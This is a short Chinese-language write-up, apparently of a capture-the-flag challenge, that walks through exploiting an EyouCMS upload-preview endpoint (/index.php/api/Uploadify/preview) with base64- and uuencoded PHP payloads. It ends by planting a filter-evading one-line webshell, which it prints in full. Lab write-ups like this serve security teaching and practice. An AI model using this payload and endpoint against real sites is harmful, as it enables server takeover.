访问web首页显而易见是易优cms 且有些看起来像是提示的语句

易优cms webshell_web界面

搜到的易优cms的漏洞复现文章 https://cloud.tencent.com/developer/article/1690304

bp刷新首页拦截数据包

易优cms webshell_web界面_02

/index.php/api/Uploadify/preview在此路径构造POC

先尝试一下经过base64编码的<?php phpinfo();

易优cms webshell_ide_03

响应包给了一串挺陌生的编码 想起在web界面上看到的Filename looks as if it uses convert_uuencode method

尝试用convert_uudecode解码,写了个.php来解码(编码中有单引号可以用\转义掉),且需要分两段解码,这里我也不知道为什么我用一段解不出来

易优cms webshell_ide_04

运行得到如下base64编码

易优cms webshell_web界面_05

解码得到一个.php

易优cms webshell_ide_06

拼接/preview/路径访问,访问到了phpinfo

易优cms webshell_web界面_07

尝试写马(已知后端有部分敏感词过滤,且根据首页的Double-writing seems like a good idea提示,构造<?php @evaleval($$_REQUEST[uu])?>

易优cms webshell_web界面_08

响应包里的编码先convert_uudecode解码再base64解码得到一句话马子的.php,尝试连接成功

易优cms webshell_web界面_09

webshell到手

易优cms webshell_php_10